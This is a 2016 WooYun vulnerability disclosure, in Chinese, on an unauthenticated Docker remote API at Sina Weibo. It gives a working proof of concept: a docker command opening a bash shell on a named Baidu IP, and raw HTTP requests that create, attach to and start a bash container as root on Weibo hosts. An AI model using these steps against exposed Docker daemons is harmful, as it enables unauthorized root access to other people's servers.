新浪微博docker remote API未授权访问导致远程命令执行(root)

编号209856
Urlhttp://www.wooyun.org/bug.php?action=view&id=209856
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题新浪微博docker remote API未授权访问导致远程命令执行(root)
漏洞类型未授权访问/权限绕过
厂商新浪微博
白帽子lijiejie
提交日期2016-05-17 20:55:00
公开日期2016-05-17 21:07:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
新浪微博两个IP docker remote API未授权访问导致远程命令执行,root权限。 因为docker版本太低,临时用burp发出几个http请求调用api,实现了远程命令执行。本篇还介绍了直接获取交互式shell的方法。
漏洞细节

http://123.125.105.158:2375/version
http://123.125.105.159:2375/version


"ApiVersion":"1.17",因为版本太低,我的docker client无法使用。我用burp来发包,实现远程执行系统命令,有一点小技巧。

weibo.apiversion.png

POC

安装docker client:

https://www.docker.com/products/docker-toolbox


以百度的那个IP为例,要获取交互式shell,首先获取images:

docker -H tcp://180.76.161.55:2375 images


docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"


这里我设置了entrypoint为/bin/bash。shell到手了,如下图:

baidu_shell.png


好了,继续看微博的机器,因为api的版本太低了,client无法直接使用。
一开始我执行命令的时候发现总不成功,查看container的时候才发现原来默认的Entrypoint是/usr/local/sinasrv2/sbin/nginx。不过创建容器的时候可以overwrite,创建一个容器:

POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip
{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}


找到Id,如图:

weibo_create_container.png


然后可以获取container的信息检查一下是否有问题,这一步可以略过:

http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json


接下来有两个http request,顺序非常重要,一定是要先attach,再start,这样就可以捕获到输出:

POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


如图,我在微博的container中执行命令,可以知道当前用户root,hostname是bcd44e3731cc,pwd是app。

weibo.rce.out.png


修复方案

2375端口不要对外

状态信息 2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复漏洞提交前已修复,故忽略。
回应信息危害等级:无影响厂商忽略忽略时间:2016-05-17 21:07
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

@黑客,绝对是黑客 赞啊,也要感谢你到wooyun分享漏洞!

lijiejie02016-05-17 21:19:00

翻了翻,其实这个在我ip列表里,然而我眼花没有看到~

黑客,绝对是黑客02016-05-17 21:14:00